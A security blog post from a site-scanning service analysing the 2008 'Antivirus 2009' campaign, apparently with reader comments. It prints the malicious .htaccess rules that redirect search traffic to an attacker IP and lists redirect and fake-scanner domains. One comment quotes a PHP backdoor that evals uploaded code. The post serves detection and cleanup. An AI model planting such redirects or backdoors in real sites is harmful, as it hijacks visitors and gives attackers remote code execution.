msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Unmasking the Antivirus 2009 .htaccess Exploit.

   08 Dec 08   Filed in Website exploits

In the previous post I described the symptoms of the Antivirus 2009 .htaccess exploit, how to detect it and get rid of it.

This time I’m going to further unmask this exploit and show how it works.

The purpose of the exploit.

This is a multi-stage campaign that involves web site hacking and social engineering. The purpose of the campaign is to have as many Windows users as possible install the trojan under the disguise of Antivirus 2009 software and then use fake security warnings to swindle money out of gullible people.

Stage 1. Hijacking search traffic.

To have people visit their web sites, rogues have hacked (I suspect) thousands of legitimate web sites and made them silently redirect search engine traffic to Antivirus 2009 landing pages.

This exploit adds conditional redirects into .htaccess files of the compromised web sites.

.htaccess is a directory-level configuration file of the most widely spread web server – Apache. This file can be used even in shared hosting environment and is a very likely target of hacker attacks. Few site owner know thise files exist (it is hidden) and what it is for. Even less know how to use it and how to read its commands. So any changes in .htaccess may remain unnoticed.

This is the malicious code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87 .248.180.90/in.html?s=ipw2 [R,L]

As you can see, these rules check the referer (the site where a visitor comes from) and if it is one of the major search engines (Google, AOL, MSN, AltaVista, Ask, Yahoo), the visitor is redirected to the intermediary hacker’s page. The IP address of this page may be different (I also saw IPs in the 89.28.13.200-5 range).

To hide this code from knowledgeable people, hackers usually precede it with a couple of screens of blank lines.

  • This little trick with redirecting search traffic may remain unnoticed by site owners for pretty long time because they very rarely click on search engine results to visit their own sites. Only regular analysis of traffic stats and security scanners like Unmask Parasites can help them detect this exploit at an early stage. (You can read about the symptoms and the detection of this exploit in the previous post)

Stage 2. Chain of redirects.

When you check the infected sites with Unmask Parasites, you can see a chain of four redirects:

302 -> http://89.28.13 .204/in.html?s=xx
302 -> http://wwwinfoclick .com/soft.php?aid=0865&d=1&product=XPA&refer=ff94bbac7
302 -> http://defense-live-scan .com/2009/1/freescan.php?nu=880865
302 -> http://defense-live-scan .com/2009/1/en/freescan.php?id=880865

The first redirect (from the compromised .htaccess file) goes to some server in Moldova (IPs 89.28.13 .200-5 and 87.248.180 .90). Update:  sometimes the following URL is used in the first redirect: “maseo .ru/h .php”

That server redirects to one of the following domains:

  • wwwinfoclick .com
  • privatewebsphere .com
  • clicksoverview .com
  • proweb-info .com
  • secured-web-space .com
  • trustedliveclicks .com

Update (January 16, 2009)

  • internetsecuredweb .com
  • securedwebsolutions .com
  • worldgreenpeace .cn
  • getluckytoday .cn
  • surfingsnight .cn
  • premiuminterestscompany .cn
  • supermannews .cn (Created: 2009-01-09)

Those servers, in turn, redirect to rogue landing page living on one of the following sites (the list may be incomplete)

  • defense-live-scan .com
  • antivirus-protectionscan .com
  • antivirusdefense .com
  • computerquickscanner .com
  • pro-scanner-online .com
  • antivirus-bestscan .com
  • pcantivirusscan .com
  • anti-virus-live-scanner .com
  • computerfastscanner .com
  • anti-virusproscan .com
  • protectionlive-scan .com
  • anti-virus-online-protection .com
  • antivirus-online-protection .com
  • advanced-scanner .com

Update (January 16, 2009)

  • bestantivirusproscan .com
  • best-antivirus-pro-scanner .com
  • bestantivirusdefence .com
  • professional-virus-scan .com
  • rapidantiviruspcscanner .com (Created: 2009-01-10)
  • premium-advanced-scan .com
  • premiumantivirusscan .com (Created: 2009-01-03)

I’m not sure about the details of this evil scheme but I think it works like this:

The hacker-loyal servers in Moldova are used to load-balance the traffic (Alexa reports that some of the sites were in Top 500 during the busiest week).

The next level (hosted by “Innovation It Solutions Corp” in the UK ) checks which servers are currently available and redirects to them.

The last level sites host the landing pages and have some anivirus-related domain name. They are the ones that web surfers see and report as malicious. That’s why most of them are currently defunct. At the time of writing (December 8) I can only see three live domains of the last level (antivirus-online-protection .com, anti-virus-online-protection .com, and advanced-scanner .com) registered on December 4 and 5.

By the way most of these domains had been registered via BIZCN.COM, INC. registrar during the last couple of weeks by the same “private person” holding several thousand other domain names.

It’s time to shut down the first two level of this redirect scheme. Otherwise they’ll register new domains every day and this scam can last for pretty long time.

Stage 3. The landing page and the bogus online scan.

Here comes the “social engineering” part of the scam.

Social engineering is the art of manipulating people into performing actions or divulging confidential information.

Warning: Don’t try this on Windows. To minimize the risk of being infected I made the screenshots on my Linux machine.

The landing page contains a JavaScript code with the following scenario:

1. The browser window is shrunk to a very small size so that you can’t see the address of the current page. This also makes you think that something’s wrong with your system.

2. At the same time the following hardcoded warning is being displayed

Antivirus 2009. Warning.

3. If you belive this bogus warning and click “OK”, the site will kindly inform that Antivirus 2009 will scan your system and you’ll need to install the “digitally signed and independently certified” software when prompted.

Antivirus 2009 will scan your system

4. If you choose to ignore the first warning and click “Cancel”, the site will also ignore your choice and redirect you to the same online scan page as if you’ve clicked “OK”.

5. Now that you know that your system is going to be scanned by Antivirus 2009, the browser window is restored to the original size. And you see the page that immediately starts to simulate the scan. You see a progress bar, changing filenames, constantly increasing number of “errors found”. Everything is harcoded and doesn’t have anything to do with scanning. It’s just an animation. For more credibility this “scanner” mimics Microsoft’s visual style.

Antivirus 2009 fake scanner.

6. A few seconds later, when the “scan” is finished, you see the following report (it looks especially funny on Macs and Linux machines). Oh no! Dangerous spyware has been detected! And the names of the found spyware are so nasty that you definitely want to remove them ASAP: IEMonster, Zlob.PornAdvertizer, Trojan.InfoStealer.Banker.

Antivirus 2009 fake report

7. A quick look at the source of the page reveals that this report is just a hardcoded image with two mouse-click actions. If you click anywhere on the “report window” (even on the fake “Ignore” button), you’ll be prompted to install an .exe file. Don’t! The name of the file changes almost everyday. Some known names are (A9installer_880865.exe, InsatallAVv_880147.exe, InstallAVg_880147.exe) The file sizes may also vary (to make the detection difficult) but they are usually less than 150Kbytes.

Download Antivirus 2009

8. If you clicked on the red “X” button of the report you’ll be advised not to close the window if “your want you” PC to be clean. Clicking “OK” will display the file download window.

Don't close this window

9. Clicking “Cancel” will display the final warning about harmful malware and the need to download and install Antivirus 2009. No options available now. Only the “OK” button that will start the file downloading.

Harmful and malicious software detected.

As you can see, every single path leads to the same final – the download and install window. You are lucky if you are on Linux or Mac, or your browser is not configured to automatically start downloads and open downloaded files. In this case you can cancel the download. Otherwise this trojan will be automatically installed on your computer.

Trojan detection

Because of the changing nature of this trojan most major (real) Antivirus packages don’t recognize Antivirus 2009 files as a threat. I submitted several av2009 files to VirusTotal during the last couple of weeks and the best detection result was today (December 8): 5 of 38 scanners recognized the file as suspicious.

VirusTotal Results
VirusTotal Results. By scanner.
Note that most popular Antiviruses (Symantec, McAffee, Kaspersky, Avast, AVG) never detected this trojan. No wonder there are so many infected computers. On the other hand Microsoft’s own scanner always detected this fake Antivirus.

Summary

This is an experimental series of articles about the Antivirus 2009 .htaccess exploit, as I’m trying to find a proper format of posts for this blog. Altough this second post may look like Dancho Danchev‘s malware campaign dissection posts, I hope I made it useful for regular web site owners.
In conclusion, I’d like to highlight some key points:
  • No site is too small for hackers if they can make it a part of their campaign.
  • If you don’t see anything suspicious doesn’t mean your site is secure.
  • Web sites consist not only of HTML pages and databases. Learn more about web server configuration. If you are on Apache, be sure to protect your .htaccess files.
  • If you don’t want to lose search engine traffic you should be serious about web site securty.
Thanks for reading.
Now you can check your own site or subscribe to the RSS feed to be notified about new posts.
Did you like the post? Any comments?

Similar posts:

Reader's Comments (16)

  1. |

    This is a very nice explanation of the exploit and its effects. Great work, and keep posting!

  2. |

    [...] use UseShots Editor myself (here is a couple of my latest blog posts created with UseShots Editor: 1, [...]

  3. |

    [...] “redirect, nu=880865” (terminatia paginii catre care eram redirectionat) si am dat de un site in care se scria despre problema ce afecteaza, se pare, mii de [...]

  4. |

    Thank’s! That article helps me to solve my problem. I replaced the code with RewriteEngine On . Is It enough?
    Thank’s again!

    • |

      Disabling the RewriteEngine will help until hackers modify/replace your .htaccess file next time.

      The better solution would be remove the malicious code from the .htaccess file and make it write-protected.

      Make sure to check the rest instructions

  5. |

    Off (not On)

  6. |

    Thanks a lot! My friend’s website was hacked with this. Interestingly, his .htaccess file was already protected (644) so the only other possibilities are that his (shared) hosting service was hacked, or, his password was hacked (it was ‘moderately strong’ – Upper case, lower case, numbers, etc – though the letters were dictionary entries (similar to Bird54bird – would that be easily hacked?)

    Every directory in the site had a .htaccess.mal file, which seemed to be a copy of the bad .htaccess file, ready to be copied back perhaps.

    • |

      I have more and more evidence that this has to do with compromised passwords.
      What FTP program did your friend use? Did he store the password in it or typed it in on every login?
      Is he on Mac or PC or Linux?

  7. |

    To avoid clutter, I will be adding new domain names of redirect sites and bogus Antivirus sites in this comment.

    softwarforgoodusers .cn
    frenchfriestaste .cn
    tourinternetgide .cn
    latenightclick .cn
    profileduser .cn
    browserpower .cn
    fulldeposite .cn
    hollywoodstarsnow .cn
    securityadvertisement .cn
    intendyoseeyou .cn
    softwaretripsgoeshere .cn
    discostylepromo .cn
    someonestrails .cn
    refereruser .cn
    orderyourdream .cn
    gonesurfing .cn
    worldwidesphere .cn
    getluckywebpagepromo .cn
    activeusersearch .cn
    styleout .cn
    goingdignity .cn
    wintertimessport .cn
    lostdomains .cn
    toplevelawards .cn
    hairstylezone .cn
    bestgossips .cn
    perfectclicks .cn
    greatwallnitro .cn
    controlledsurfaces .cn
    pleasentsurfing .cn
    saturationpower .cn
    fordgreatcars .cn
    teafuntrip .cn
    getveryluckytoday .cn
    prideandglorynow .cn
    worldcommercialbusiness .cn
    constructorwebspace .cn
    alaskatoursonline .cn
    softwareoverworld .cn
    tabletpccomputing .cn
    securedradiostation .cn

    high-protection .info

    computerantiviruslivescanner .com
    rapidantivirusonlinescan .com
    pro-antispyware-scanner .com
    premium-antivirus-scan .com
    premiumonlinescanner .com
    bestanti-virusscan .com
    fast-antispyware-scan .com
    fastantispywarescanner .com
    fast-antivirus-pro-scan .com
    antispywareonlinescanner .com
    antispywareprolivescan .com
    antispywareliveproscan .com
    antispywareprolivescanner .com
    antispywareinternetproscan .com
    antispyware-internet-scan .com
    antispyware-premium-scan .com
    antispyware-live-pro-scan .com
    antispyware-online-scan .com
    bestantispywarescan .com
    bestantispywarelivescan .com
    computerantivirusscanner .com
    computerantivirusproscan .com
    antimalware-pro-scanner .com
    anti-malware-pro-scanner .com
    anti-malware-pro-scan .com
    antimalware-live-scanner .com
    antimalwareliveproscanner .com
    antimalwareliveproscanner .com
    antimalwareliveproscan .com
    antimalware-online-scanner .com
    premiumantiviruscheck .com
    antimalwaresuperscanner .com
    onlineantivirusproscan .com
    bestantimalwaredefence .com
    liteantispywareproscanner .com
    liteantimalwarescanner .com
    lite-anti-virus-scan .com
    liveantimalwarescan .com
    liveantimalwarefastscnan .com
    pro-antimalware-scanner .com
    fastantimalwareproscanner .com
    best-antimalware-pro-scan .com
    bestantimalwarelivescanner .com

  8. |

    We’ve seen this type of attack here at work as well. Please see my comment (once moderated) on http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/

    the root cause is the same, hijacked ftp accounts.

  9. |

    Hi,

    Thank you very much for this information. My website was leading to a malious site when it is searched on Yahoo / Google etc., but it worked fine if we type the name in the address bar. I was totally confused and after reading your article i found that there was an .htaccess exactly as mentioned above that redirects all my search engine traffic to 87 .248.180.90

    Now that i removed that entry, my website is back to normal on the search engines.

    Thanks again for this article.

    Regards,
    Aravind. C

  10. |

    Thanks a lot for this great article! and keep writing!

    Regards,
    Anand

  11. |

    Hi, the same thing happend to our website.
    After a lot of searching we discovered the .htaccess and a rewrite to a fake blog in my server that had a javascript redirect to http:// scanpcsecurity . com

    The first time it happend I changed all the passwords, desactivated ssh access and disabled all ftp users.

    I am a Mac user and I stored the new password as text in my ftp application Cyberduck.

    I am still trying to figure out how it happened.

  12. |

    Hi again,

    Just found out a new thing. Looking at my Status and Errors Report I find that somebody tried to access this file ( beta/img/.svn/tmp/ugatef.php ) 4 times.

    I look at the Date Over Time report of that file and I see that it is 4 times the same day.

    I download all the logs from that day and search for the file ugatef.php.

    After the 4 attemps I see that somebody access another file that shouldn’t be on my structure ( /newsletter/content/aceheg.php ).

    In this file I find PHP code with these lines:

    (…)

    if (md5($_POST["p"])==”aace99428c50dbe965acc93f3f275cd3″){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],”rb”),$HTTP_POST_FILES["f"]["size"])){ eval($code);

    (…)

    If I understand correctly, from here a maliciuos user can execute PHP code as POST from a remote HTML form.

    Contact me if you want more info.

    Thanks,
    alx

  13. |

    I would recommend anyone who thinks they may be infected with the viruses this spreads, to do a complete OS re-install. This is the most thorough way of cleaning infections from your system, because some of these bugs really borough deep into the code.

  14. |

    Do you know of anyway with htaccess to disable someone from using your domain to point to their own website on the same server? Ex: they use YOURDOMAIN.com to promote their PHISHING WEBSITE.COM by using this simple URL to send users : YOURDOMAIN.COM/~phishing/file.html

    Any help would be greatly appreciated. Thanks